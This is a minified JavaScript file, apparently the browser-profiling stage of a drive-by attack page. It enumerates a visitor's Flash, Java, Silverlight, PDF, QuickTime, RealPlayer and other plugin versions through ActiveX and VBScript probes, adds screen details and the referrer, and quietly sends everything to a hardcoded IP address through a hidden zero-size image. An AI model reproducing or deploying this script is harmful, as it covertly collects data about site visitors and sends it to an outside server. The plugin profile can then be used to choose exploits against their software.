var j_d=document;var j_n=navigator;var j_w=window;var v_a = 'http://91.121.168.24/';var FlashDetect=new function(){var self=this;self.installed=false;self.raw="";self.major=-1;self.minor=-1;self.revision=-1;self.revisionStr="";var activeXDetectRules=[{"name":"ShockwaveFlash.ShockwaveFlash.7","version":function(obj){return getActiveXVersion(obj);}},{"name":"ShockwaveFlash.ShockwaveFlash.6","version":function(obj){var version="6,0,21";try{obj.AllowScriptAccess="always";version=getActiveXVersion(obj);}catch(err){}return version;}},{"name":"ShockwaveFlash.ShockwaveFlash","version":function(obj){return getActiveXVersion(obj);}}];var getActiveXVersion=function(activeXObj){var version=-1;try{version=activeXObj.GetVariable("$version");}catch(err){}return version;};var getActiveXObject=function(name){var obj=-1;try{obj=new ActiveXObject(name);}catch(err){}return obj;};var parseActiveXVersion=function(str){var versionArray=str.split(",");return{"raw":str,"major":parseInt(versionArray[0].split(" ")[1],10),"minor":parseInt(versionArray[1],10),"revision":parseInt(versionArray[2],10),"revisionStr":versionArray[2]};};var parseStandardVersion=function(str){var descParts=str.split(/ +/);var majorMinor=descParts[2].split(/\./);var revisionStr=descParts[3];return{"raw":str,"major":parseInt(majorMinor[0],10),"minor":parseInt(majorMinor[1],10),"revisionStr":revisionStr,"revision":parseRevisionStrToInt(revisionStr)};};var parseRevisionStrToInt=function(str){return parseInt(str.replace(/[a-zA-Z]/g,""),10)||self.revision;};self.majorAtLeast=function(version){return self.major>=version;};self.FlashDetect=function(){if(j_n.plugins&&j_n.plugins.length>0){var type='application/x-shockwave-flash';var mimeTypes=j_n.mimeTypes;if(mimeTypes&&mimeTypes[type]&&mimeTypes[type].enabledPlugin&&mimeTypes[type].enabledPlugin.description){var version=mimeTypes[type].enabledPlugin.description;var versionObj=parseStandardVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revisionStr=versionObj.revisionStr;self.revision=versionObj.revision;self.installed=true;}}else if(j_n.appVersion.indexOf("Mac")==-1&&j_w.execScript){var version=-1;for(var i=0;i<activeXDetectRules.length&&version==-1;i++){var obj=getActiveXObject(activeXDetectRules[i].name);if(typeof obj=="object"){self.installed=true;version=activeXDetectRules[i].version(obj);if(version!=-1){var versionObj=parseActiveXVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revision=versionObj.revision;self.revisionStr=versionObj.revisionStr;}}}}}();};FlashDetect.release="1.0.3";if(!PluginDetect){var PluginDetect={getNum:function(A,_2){if(!this.num(A)){return null}var m;if(typeof _2=="undefined"){m=/[\d][\d\.\_,-]*/.exec(A)}else{m=(new RegExp(_2)).exec(A)}return m?m[0].replace(/[\.\_-]/g,","):null},hasMimeType:function(_4){var s,t,z,M=_4.constructor==String?[_4]:_4;for(z=0;z<M.length;z++){s=j_n.mimeTypes[M[z]];if(s&&s.enabledPlugin){t=s.enabledPlugin;if(t.name||t.description){return s}}}return null},v_agNavPlugin:function(N,_7){var _8=N.constructor==String?N:N.join(".*"),numS=_7===false?"":"\\d";var i,re=new RegExp(_8+".*"+numS+"|"+numS+".*"+_8,"i");var _a=j_n.plugins;for(i=0;i<_a.length;i++){if(re.test(_a[i].description)||re.test(_a[i].name)){return _a[i]}}return null},getAXO:function(_b){var _c,e;try{_c=new ActiveXObject(_b);return _c}catch(e){}return null},num:function(A){return (typeof A!="string"?false:(/\d/).test(A))},compareNums:function(_e,_f){if(!this.num(_e)||!this.num(_f)){return 0}if(this.plugin&&this.plugin.compareNums){return this.plugin.compareNums(_e,_f)}var m1=_e.split(","),m2=_f.split(","),x,p=parseInt;for(x=0;x<Math.min(m1.length,m2.length);x++){if(p(m1[x],10)>p(m2[x],10)){return 1}if(p(m1[x],10)<p(m2[x],10)){return -1}}return 0},formatNum:function(num){if(!this.num(num)){return null}var x,n=num.replace(/\s/g,"").replace(/[\.\_]/g,",").split(",").concat(["0","0","0","0"]);for(x=0;x<4;x++){if(/^(0+)(.+)$/.test(n[x])){n[x]=RegExp.$2}}return n[0]+","+n[1]+","+n[2]+","+n[3]},initScript:function(){var $=this,IE;$.v_w=(/*@cc_on!@*/false);$.IEver=-1;$.ActiveXEnabled=false;if($.v_w){IE=(/msie\s*\d\.{0,1}\d*/i).exec(j_n.userAgent);if(IE){$.IEver=parseFloat((/\d.{0,1}\d*/i).exec(IE[0]),10)}var _14,x;_14=["ShockwaveFlash.ShockwaveFlash","Msxml2.XMLHTTP","Microsoft.XMLDOM","Msxml2.DOMDocument","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(x=0;x<_14.length;x++){if($.getAXO(_14[x])){$.ActiveXEnabled=true;break}}}if($.v_w){$.head=typeof j_d.getElementsByTagName!="undefined"?j_d.getElementsByTagName("head")[0]:null}},init:function(_15){if(typeof _15!="string"){return -3}_15=_15.toLowerCase().replace(/\s/g,"");var $=this,IE,p;if(typeof $[_15]=="undefined"){return -3}p=$[_15];$.plugin=p;if(typeof p.installed=="undefined"){p.minversion={};p.installed=null;p.version=null;p.getVersionDone=null}$.garbage=false;if($.v_w&&!$.ActiveXEnabled){return -2}return 1},isMinVersion:function(_17,_18,_19){var $=PluginDetect,i=$.init(_17);if(i<0){return i}if(typeof _18=="undefined"||_18==null){_18="0"}if(typeof _18=="number"){_18=_18.toString()}if(!$.num(_18)){return -3}_18=$.formatNum(_18);if(typeof _19=="undefined"){_19=null}var p=$.plugin,m=p.minversion;if(typeof m["a"+_18]=="undefined"){if(p.getVersionDone==null){var tmp,x;for(x in m){tmp=$.compareNums(_18,x.substring(1,x.length));if(m[x]==1&&tmp<=0){return 1}if(m[x]==-1&&tmp>=0){return -1}};p.getVersion(_18,_19)}if(typeof m["a"+_18]!="undefined"){}else{if(p.version!=null||p.installed!=null){p.getVersionDone=1;m["a"+_18]=(p.installed==-1?-1:(p.version==null?0:($.compareNums(p.version,_18)>=0?1:-1)))}else{m["a"+_18]=-1}}}$.cleanup();return m["a"+_18];return -3},getVersion:function(_1d,_1e){var $=PluginDetect,i=$.init(_1d);if(i<0){return null}var p=$.plugin;if(typeof _1e=="undefined"){_1e=null}if(p.getVersionDone==null){p.getVersion(null,_1e);p.getVersionDone=1}$.cleanup();return p.version;return null},cleanup:function(){var $=this;if($.garbage&&typeof j_w.CollectGarbage!="undefined"){j_w.CollectGarbage()}},isActiveXObject:function(_22){var $=this,result,e,s="<object width=\"1\" height=\"1\" "+"style=\"display:none\" "+$.plugin.getCodeBaseVersion(_22)+">"+$.plugin.HTML+"</object>";if($.head.firstChild){$.head.insertBefore(j_d.createElement("object"),$.head.firstChild)}else{$.head.appendChild(j_d.createElement("object"))}$.head.firstChild.outerHTML=s;try{$.head.firstChild.classid=$.plugin.classID}catch(e){}result=false;try{if($.head.firstChild.object){result=true}}catch(e){}try{if(result&&$.head.firstChild.readyState<4){$.garbage=true}}catch(e){}$.head.removeChild($.head.firstChild);return result},codebaseSearch:function(min){var $=this;if(typeof min!="undefined"){return $.isActiveXObject(min)};var _26=[0,0,0,0],x,y,A=$.plugin.digits,t=function(x,y){var _29=(x==0?y:_26[0])+","+(x==1?y:_26[1])+","+(x==2?y:_26[2])+","+(x==3?y:_26[3]);return $.isActiveXObject(_29)};var _2a,tmp;var _2b=false;for(x=0;x<A.length;x++){_2a=A[x]*2;_26[x]=0;for(y=0;y<20;y++){if(_2a==1&&x>0&&_2b){break}if(_2a-_26[x]>1){tmp=Math.round((_2a+_26[x])/2);if(t(x,tmp)){_26[x]=tmp;_2b=true}else{_2a=tmp}}else{if(_2a-_26[x]==1){_2a--;if(!_2b&&t(x,_2a)){_2b=true}break}else{if(!_2b&&t(x,_2a)){_2b=true}break}}}if(!_2b){return null}}return _26.join(",")},dummy1:0}}PluginDetect.initScript();PluginDetect.quicktime={mimeType:["video/quicktime","application/x-quicktimeplayer","image/x-macpaint","image/x-quicktime"],progID:"QuickTimeCheckObject.QuickTimeCheck.1",progID0:"QuickTime.QuickTime",classID:"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B",minIEver:7,HTML:"<param name=\"src\" value=\"A14999.mov\" /><param name=\"controller\" value=\"false\" />",getCodeBaseVersion:function(v){var r=v.replace(/[\.\_]/g,",").split(","),$=PluginDetect;if($.compareNums(v,"7,5,0,0")>=0){v=r[0]+","+r[1]+r[2]+","+r[3]}return "codebase=\"#version="+v+"\""},digits:[16,16,16,0],clipTo3digits:function(v){if(v==null||typeof v=="undefined"){return null}var t;t=v.split(",");return t[0]+","+t[1]+","+t[2]+",0"},getVersion:function(min){var _31=null,p,$=PluginDetect;if(typeof min=="undefined"){min=null}min=this.clipTo3digits(min);if(!$.v_w){p=$.v_agNavPlugin(["QuickTime","(Plug-in|Plugin)"]);if(p&&p.name&&$.hasMimeType(this.mimeType)){_31=$.getNum(p.name)}this.installed=_31?1:-1}else{var obj;if($.IEver<this.minIEver){obj=$.getAXO(this.progID);if(obj&&obj.QuickTimeVersion){_31=obj.QuickTimeVersion.toString(16);_31=_31.charAt(0)+"."+_31.charAt(1)+"."+_31.charAt(2)}}else{if($.getAXO(this.progID0)){if(min==null){_31=$.codebaseSearch()}else{this.minversion["a"+min]=$.codebaseSearch(min)?1:-1;return}}}this.installed=_31?1:($.getAXO(this.progID0)?0:-1)}this.version=this.clipTo3digits($.formatNum(_31))}};PluginDetect.java={mimeType:"application/x-java-applet",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",DTKclassID:"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",DTKmimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",minWebStart:"1,4,2,0",JavaVersions:["1,9,1,25","1,8,1,25","1,7,1,25","1,6,1,25","1,5,0,25","1,4,2,25","1,3,1,25"],lowestPreApproved:"1,6,0,02",lowestSearchable:"1,3,1,0",searchAXOJavaPlugin:function(min,_34){var e,z,T,$=PluginDetect;var _36,C_DE,C,DE,v;var AXO=ActiveXObject;var _38=(typeof _34!="undefined")?_34:this.minWebStart;var Q=min.split(","),x;for(x=0;x<4;x++){Q[x]=parseInt(Q[x],10)}for(x=0;x<3;x++){if(Q[x]>9){Q[x]=9}}if(Q[3]>99){Q[3]=99}var _3a="JavaPlugin."+Q[0]+Q[1]+Q[2]+(Q[3]>0?("_"+(Q[3]<10?"0":"")+Q[3]):"");for(z=0;z<this.JavaVersions.length;z++){if($.compareNums(min,this.JavaVersions[z])>0){return null}T=this.JavaVersions[z].split(",");_36="JavaPlugin."+T[0]+T[1];v=T[0]+"."+T[1]+".";for(C=T[2];C>=0;C--){if($.compareNums(T[0]+","+T[1]+","+C+",0",_38)>=0){try{new AXO("JavaWebStart.isInstalled."+v+C+".0")}catch(e){continue}}if($.compareNums(min,T[0]+","+T[1]+","+C+","+T[3])>0){return null}for(DE=T[3];DE>=0;DE--){C_DE=C+"_"+(DE<10?"0"+DE:DE);try{new AXO(_36+C_DE);return v+C_DE}catch(e){}if(_36+C_DE==_3a){return null}}try{new AXO(_36+C);return v+C}catch(e){}if(_36+C==_3a){return null}}}return null},minIEver:7,HTML:"<param name=\"code\" value=\"A14999.class\" />",getCodeBaseVersion:function(v){var r=v.replace(/[\.\_]/g,",").split(","),$=PluginDetect;if($.compareNums(v,"1,4,1,02")<0){v=r[0]+","+r[1]+","+r[2]+","+r[3]}else{if($.compareNums(v,"1,5,0,02")<0){v=r[0]+","+r[1]+","+r[2]+","+r[3]+"0"}else{v=Math.round((parseFloat(r[0]+"."+r[1],10)-1.5)*10+5)+","+r[2]+","+r[3]+"0"+",0"}}return "codebase=\"#version="+v+"\""},digits:[2,8,8,32],getFromMimeType:function(_3d){var x,t,$=PluginDetect;var re=new RegExp(_3d);var tmp,v="0,0,0,0",digits="";for(x=0;x<j_n.mimeTypes.length;x++){t=j_n.mimeTypes[x];if(re.test(t.type)&&t.enabledPlugin){t=t.type.substring(t.type.indexOf("=")+1,t.type.length);tmp=$.formatNum(t);if($.compareNums(tmp,v)>0){v=tmp;digits=t}}}return digits.replace(/[\.\_]/g,",")},hasRun:false,value:null,queryJavaHandler:function(){var $=PluginDetect.java,j=j_w.java,e;$.hasRun=true;try{if(typeof j.lang!="undefined"&&typeof j.lang.System!="undefined"){$.value=j.lang.System.getProperty("java.version")+" "}}catch(e){}},queryJava:function(){var $=PluginDetect,t=this,nv_s=j_n.userAgent,e;if(typeof j_w.java!="undefined"&&j_w.j_n.javaEnabled()){if(/gecko/i.test(nv_s)){if($.hasMimeType("application/x-java-vm")){try{var div=j_d.createElement("div"),evObj=j_d.createEvent("HTMLEvents");evObj.initEvent("focus",false,true);div.addEventListener("focus",t.queryJavaHandler,false);div.dispatchEvent(evObj)}catch(e){}if(!t.hasRun){t.queryJavaHandler()}}}else{if(/opera.9\.(0|1)/i.test(nv_s)&&/mac/i.test(nv_s)){return null}t.queryJavaHandler()}}return t.value},getVersion:function(min,jar){if(typeof min=="undefined"){min=null}if(typeof jar=="undefined"){jar=null}var _46=null,$=PluginDetect;var dtk=this.queryDeploymentToolKit();if(dtk==-1&&$.v_w){this.installed=-1;return}if(dtk!=-1&&dtk!=null){_46=dtk}if(!$.v_w){var p1,p2,p,tmp;var _49,mt;mt=$.hasMimeType(this.mimeType);_49=(mt&&j_n.javaEnabled());if(!_46&&_49){tmp="Java[^\\d]*Plug-in";p=$.v_agNavPlugin(tmp);if(p){tmp=new RegExp(tmp,"i");p1=tmp.test(p.description)?$.getNum(p.description):null;p2=tmp.test(p.name)?$.getNum(p.name):null;if(p1&&p2){_46=($.compareNums($.formatNum(p1),$.formatNum(p2))>=0)?p1:p2}else{_46=p1||p2}}}if(!_46&&(_49||(mt&&/linux/i.test(j_n.userAgent)&&$.v_agNavPlugin("IcedTea.*Java",false)))){tmp=this.getFromMimeType("application/x-java-applet.*jpi-version.*=");if(tmp!=""){_46=tmp}}if(!_46&&_49&&/macintosh.*safari/i.test(j_n.userAgent)){p=$.v_agNavPlugin("Java.*\\d.*Plug-in.*Cocoa",false);if(p){p1=$.getNum(p.description);if(p1){_46=p1}}}if(!_46){p=this.queryJava();if(p){_46=p}}if(!_46&&mt){p=this.queryExternalApplet(jar);if(p[0]){_46=p[0]}}if(!_46&&_49&&!/macintosh.*ppc/i.test(j_n.userAgent)){tmp=this.getFromMimeType("application/x-java-applet.*version.*=");if(tmp!=""){_46=tmp}}this.installed=_46?1:-1;if(!_46&&_49){if(/safari/i.test(j_n.userAgent)){this.installed=0}}}else{var Q;if(!_46){if($.IEver>=this.minIEver){Q=this.v_agMax(this.lowestPreApproved,min);_46=this.searchAXOJavaPlugin(Q,this.lowestPreApproved)}else{Q=this.v_agMax(this.lowestSearchable,min);_46=this.searchAXOJavaPlugin(Q)}}if(!_46){this.JavaFix()}if(!_46){tmp=this.queryExternalApplet(jar);if(tmp[0]){_46=tmp[0]}}if(!_46&&$.IEver>=this.minIEver){if(min==null){_46=$.codebaseSearch()}else{this.minversion["a"+min]=$.codebaseSearch(min)?1:-1;return}}this.installed=_46?1:-1}this.setVersion(_46)},v_agMax:function(_4b,_4c){var $=PluginDetect;if(typeof _4c=="undefined"||_4c==null||$.compareNums(_4c,_4b)<0){return _4b}return _4c},setVersion:function(_4e){var $=PluginDetect;this.version=$.formatNum($.getNum(_4e));if(typeof this.version=="string"&&this.allVersions.length==0){this.allVersions[0]=this.version}},allVersions:[],queryDeploymentToolKit:function(){if(typeof this.queryDTKresult!="undefined"){return this.queryDTKresult}this.allVersions=[];var $=PluginDetect,e,x;var _51=[null,null],obj;var len=null;if($.v_w&&$.IEver>=6){_51=$.instantiate("object","","")}if(!$.v_w&&$.hasMimeType(this.DTKmimeType)){_51=$.instantiate("object","type="+this.DTKmimeType,"")}if(_51[0]&&_51[1]&&_51[1].parentNode){obj=_51[0].firstChild;if($.v_w&&$.IEver>=6){try{obj.classid=this.DTKclassID}catch(e){}try{if(obj.object&&obj.readyState<4){$.garbage=true}}catch(e){}}try{len=obj.jvms.getLength();if(len!=null&&len>0){for(x=0;x<len;x++){this.allVersions[x]=$.formatNum($.getNum(obj.jvms.get(x).version))}}}catch(e){}_51[1].parentNode.removeChild(_51[1])}this.queryDTKresult=this.allVersions.length>0?this.allVersions[this.allVersions.length-1]:(len==0?-1:null);return this.queryDTKresult},queryExternalApplet:function(jar){if(!jar||typeof jar!="string"){return [null,null]}if(typeof this.queryExternalAppletResult!="undefined"){return this.queryExternalAppletResult}var $=PluginDetect,e,version=null,vendor=null,obj;var _55;var par="<param name=\"archive\" value=\""+jar+"\" />"+"<param name=\"mayscript\" value=\"true\" />"+"<param name=\"scriptable\" value=\"true\" />";var _57=function(_58){var obj,e;if(_58[0]&&_58[1]&&_58[1].parentNode){obj=_58[0].firstChild;try{if($.v_w&&obj.object&&obj.readyState<4){$.garbage=true}}catch(e){}try{version=obj.getVersion()+" ";vendor=obj.getVendor()+" "}catch(e){}_58[1].parentNode.removeChild(_58[1])}};if($.v_w){_55=$.instantiate("object","archive=\""+jar+"\" code=\"A.class\" type=\""+this.mimeType+"\"","<param name=\"code\" value=\"A.class\" />"+par)}else{_55=$.instantiate("object","archive=\""+jar+"\" classid=\"java:A.class\" type=\""+this.mimeType+"\"",par)}_57(_55);if(!version){_55=$.instantiate("applet","archive=\""+jar+"\" code=\"A.class\" mayscript=\"true\"","<param name=\"mayscript\" value=\"true\">");_57(_55)}this.queryExternalAppletResult=[version,vendor];return this.queryExternalAppletResult},JavaFix:function(){var $=PluginDetect;if($.v_w&&j_w.history&&j_w.history.length==0&&j_w.location&&(/^file/).test(j_w.location.href)){var _5b=$.instantiate("object","codebase=\"#version=99,99,99,99\" classid=\""+this.classID+"\"",this.HTML);if(_5b[1]&&_5b[1].parentNode){_5b[1].parentNode.removeChild(_5b[1])}}}};PluginDetect.devalvr={mimeType:"application/x-devalvrx",progID:"DevalVRXCtrl.DevalVRXCtrl.1",classID:"clsid:5D2CF9D0-113A-476B-986F-288B54571614",getVersion:function(){var _5c=null,p,$=PluginDetect,e;if(!$.v_w){p=$.v_agNavPlugin("DevalVR");if(p&&p.name&&$.hasMimeType(this.mimeType)){_5c=p.description.split(" ")[3]}this.installed=_5c?1:-1}else{var _5d,o,obj;o=$.getAXO(this.progID);if(o){_5d=$.instantiate("object","classid=\""+this.classID+"\"","<param name=\"src\" value=\"\" />");if(_5d[0]&&_5d[1]&&_5d[1].parentNode){obj=_5d[0].firstChild;try{if(obj.pluginversion){_5c="00000000"+obj.pluginversion.toString(16);_5c=_5c.substr(_5c.length-8,8);_5c=parseInt(_5c.substr(0,2),16)+","+parseInt(_5c.substr(2,2),16)+","+parseInt(_5c.substr(4,2),16)+","+parseInt(_5c.substr(6,2),16)}}catch(e){}_5d[1].parentNode.removeChild(_5d[1])}}this.installed=_5c?1:(o?0:-1)}this.version=$.formatNum(_5c)}};PluginDetect.flash={mimeType:["application/x-shockwave-flash","application/futuresplash"],progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",getVersion:function(){var _5e=function(A){if(!A){return null}var m=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(A);return m?m[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null};var p,$=PluginDetect,e,i,version=null,AXO=null,majV=null;if(!$.v_w){p=$.v_agNavPlugin("Flash");if(p&&p.description&&$.hasMimeType(this.mimeType)){version=_5e(p.description)}}else{for(i=15;i>2;i--){AXO=$.getAXO(this.progID+"."+i);if(AXO){majV=i.toString();break}}if(majV=="6"){try{AXO.AllowScriptAccess="always"}catch(e){return "6,0,21,0"}}try{version=_5e(AXO.GetVariable("$version"))}catch(e){}if(!version&&majV){version=majV}}this.installed=version?1:-1;this.version=$.formatNum(version);return true}};PluginDetect.shockwave={mimeType:"application/x-director",progID:"SWCtl.SWCtl",classID:"clsid:166B1BCA-3F9C-11CF-8075-444553540000",getVersion:function(){var _62=null,s=null,e,p,$=PluginDetect;if(!$.v_w){p=$.v_agNavPlugin("Shockwave for Director");if(p&&p.description&&$.hasMimeType(this.mimeType)){_62=$.getNum(p.description)}}else{try{s=$.getAXO(this.progID).ShockwaveVersion("")}catch(e){}if(typeof s=="string"&&s.length>0){_62=$.getNum(s)}else{if($.getAXO(this.progID+".8")){_62="8"}else{if($.getAXO(this.progID+".7")){_62="7"}else{if($.getAXO(this.progID+".1")){_62="6"}}}}}this.installed=_62?1:-1;this.version=$.formatNum(_62)}};PluginDetect.instantiate=function(_63,_64,_65){var e,d=j_d,tag1="<"+_63+" width=\"1\" height=\"1\" "+_64+">"+_65+"</"+_63+">",body=(d.getElementsByTagName("body")[0]||d.body),div=d.createElement("div");if(body){body.appendChild(div)}else{try{d.write("<div>o</div><div>"+tag1+"</div>");body=(d.getElementsByTagName("body")[0]||d.body);body.removeChild(body.firstChild);div=body.firstChild}catch(e){try{body=d.createElement("body");d.getElementsByTagName("html")[0].appendChild(body);body.appendChild(div);div.innerHTML=tag1;return [div,body]}catch(e){}}return [div,div]}if(div&&div.parentNode){try{div.innerHTML=tag1}catch(e){}}return [div,div]};PluginDetect.j_wsmediaplayer={mimeType:["application/x-mplayer2","application/asx"],progID:"wmplayer.ocx",classID:"clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6",getVersion:function(){var _67=null,$=PluginDetect,tmp=null;this.installed=-1;if(!$.v_w){if($.hasMimeType(this.mimeType)){if($.v_agNavPlugin(["Windows","Media","(Plug-in|Plugin)"],false)||$.v_agNavPlugin(["Flip4Mac","Windows","Media"],false)){this.installed=0}var q=(/rv\:(1\.[0-7]|0).*Gecko/).test(j_n.userAgent);if(!q&&$.v_agNavPlugin(["Windows","Media","Firefox Plugin"],false)){var _69=$.instantiate("object","type=\""+this.mimeType[0]+"\"","");if(_69[0]&&_69[1]){if(_69[0].firstChild){_67=_69[0].firstChild.versionInfo}if(_69[1].parentNode){_69[1].parentNode.removeChild(_69[1])}}}}}else{tmp=$.getAXO(this.progID);if(tmp){_67=tmp.versionInfo}}if(_67){this.installed=1}this.version=$.formatNum(_67)}};PluginDetect.silverlight={mimeType:"application/x-silverlight",progID:"AgControl.AgControl",digits:[9,20,9,12,31],getVersion:function(){var $=PluginDetect,d=j_d;var _6b=null,obj=null;var _6c=false;if(!$.v_w){var _6d=[null,null];var _6e=$.v_agNavPlugin("Silverlight Plug-in",false);var _6f=(/rv\:.*Gecko/i).test(j_n.userAgent);var _70=(/rv\:(1\.[0-6]|0).*Gecko/i).test(j_n.userAgent);if(_6e&&$.hasMimeType(this.mimeType)){_6b=$.formatNum(_6e.description);if(_6b){result=_6b.split(",");if(parseInt(result[2])>=30226&&parseInt(result[0])<2){result[0]="2"}_6b=result.join(",")}if(_6f&&!_70){_6c=true}if(!_6c&&!_70&&_6b){_6d=$.instantiate("object","type=\""+this.mimeType+"\"","");if(_6d[0]){obj=_6d[0].firstChild;if(obj){if(typeof obj.IsVersionSupported!="undefined"){_6c=true}if(!_6c){obj.data="data:"+this.mimeType+",";if(typeof obj.IsVersionSupported!="undefined"){_6c=true}}if(_6d[1]&&_6d[1].parentNode){_6d[1].parentNode.removeChild(_6d[1])}}}}}}else{var _71=[1,0,1,1,1],obj=$.getAXO(this.progID);var x,y,s,DD=function(a){return (a<10?"0":"")+a.toString()},t=function(x,y){var _76=(x==0?y:_71[0])+"."+(x==1?y:_71[1])+"."+(x==2?y:_71[2])+DD(x==3?y:_71[3])+DD(x==4?y:_71[4])+".0",e;try{return obj.IsVersionSupported(_76)}catch(e){}return false};if(obj&&typeof obj.IsVersionSupported!="undefined"){for(x=0;x<this.digits.length;x++){s=_71[x];for(y=s+(x==0?0:1);y<=this.digits[x];y++){if(t(x,y)){_6c=true;_71[x]=y}else{break}}if(!_6c){break}}if(_6c){_6b=_71[0]+","+_71[1]+","+_71[2]+DD(_71[3])+DD(_71[4])+",0"}}}this.installed=_6c?1:-1;this.version=$.formatNum(_6b)}};PluginDetect.vlc={mimeType:"application/x-vlc-plugin",progID:"VideoLAN.VLCPlugin",compareNums:function(_77,_78){var m1=_77.split(","),m2=_78.split(","),x,a1,a2,b1,b2,t;for(x=0;x<Math.min(m1.length,m2.length);x++){t=/([\d]+)([a-z]?)/.test(m1[x]);a1=parseInt(RegExp.$1,10);b1=(x==2&&RegExp.$2.length>0)?RegExp.$2.charCodeAt(0):-1;t=/([\d]+)([a-z]?)/.test(m2[x]);a2=parseInt(RegExp.$1,10);b2=(x==2&&RegExp.$2.length>0)?RegExp.$2.charCodeAt(0):-1;if(a1!=a2){return (a1>a2?1:-1)}if(x==2&&b1!=b2){return (b1>b2?1:-1)}}return 0},getVersion:function(){var $=PluginDetect,p,version=null,e;if(!$.v_w){if($.hasMimeType(this.mimeType)){p=$.v_agNavPlugin(["VLC","(Plug-in|Plugin)"],false);if(p&&p.description){version=$.getNum(p.description,"[\\d][\\d\\.]*[a-z]*")}}this.installed=version?1:-1}else{p=$.getAXO(this.progID);if(p){try{version=$.getNum(p.VersionInfo,"[\\d][\\d\\.]*[a-z]*")}catch(e){}}this.installed=p?1:-1}this.version=$.formatNum(version)}};if(FlashDetect.installed) {var v_t = "1";var majorFlash = FlashDetect.major;var minorFlash = FlashDetect.minor;}else {var v_t = "0";var majorFlash = "NULL";var minorFlash = "NULL";}function f_c(v_e) {var tjs = v_e.indexOf("/",7);var tjs2= 0;var v_al=v_e.substring(7,v_e.indexOf("/",7));return v_al;}function f_d(expr,a,b) {var i=0;while (i!=-1) {i=expr.indexOf(a,i);if (i>=0) {   expr=expr.substring(0,i)+b+expr.substring(i+a.length);i+=b.length;}}  return expr;}function f_e(v_ab){v_ag = false;j_d.write('<SCR' + 'IPT LANGUAGE=VBScript>\n on error resume next \n v_ag = IsObject(CreateObject("' + v_ab + '"))</SCR' + 'IPT>\n');if (v_ag) {return '1';}else {return '0';}}function f_f(v_ab){v_ag = "0";if (v_aa.indexOf(v_ab) != -1) {if (j_n.mimeTypes[v_ab].enabledPlugin != null) {v_ag = "1";}}return v_ag;}if(j_n.javaEnabled()){v_v='1';} else {v_v='0';}var v_am = (PluginDetect.isMinVersion('Silverlight', '0') >= 0 ? '1' : '0');var v_s=j_n.userAgent.toLowerCase();var v_r  = (j_n.appName.indexOf("Netscape") != -1);var v_w  = (v_s.indexOf("msie") != -1);var v_q = (v_s.indexOf("mac")!=-1);var v_p = ((v_s.indexOf("win")!=-1) || (v_s.indexOf("32bit")!=-1));if (v_p && v_w){var v_x = f_e("SWCtl.SWCtl.1");var v_y = '0';if (f_e("PDF.PdfCtrl.1") == '1') {v_y = '1';}if (f_e('PDF.PdfCtrl.5') == '1') {v_y = '1';}if (f_e('PDF.PdfCtrl.6') == '1') {v_y = '1';}var v_z = f_e("QuickTimeCheckObject.QuickTimeCheck.1");var pReal  = f_e("rmocx.RealPlayer G2 Control.1");var pWinMedia = f_e("MediaPlayer.MediaPlayer.1");}if (!v_p || v_r){v_aa = "";for (var i=0; i < j_n.mimeTypes.length; i++)v_aa += j_n.mimeTypes[i].type.toLowerCase();var v_x = f_f("application/x-director");var v_y = f_f("application/pdf");var v_z = f_f("video/quicktime");var pReal  = f_f("audio/x-pn-realaudio-plugin");var pWinMedia = f_f("application/x-mplayer2");}res = screen.width+"x"+screen.height;c = screen.colorDepth;v_o =  'color='+c;v_o += '&res='+res;v_o += '&flash='+v_t+'&majorFlash='+majorFlash+'&minorFlash='+minorFlash+'&director='+v_x+'&quicktime='+v_z+'&real='+pReal+'&wm='+pWinMedia;v_o += '&pdf='+v_y+'&java='+v_v;v_o += '&silverlight='+v_am;j_d.write("<img width='0' height='0' align='absmiddle' style='cursor:pointer;' src='"+v_a+"tm-stats-session.php?key_swf="+key_swf+"&history="+escape(j_d.referrer)+"&"+v_o+"' >");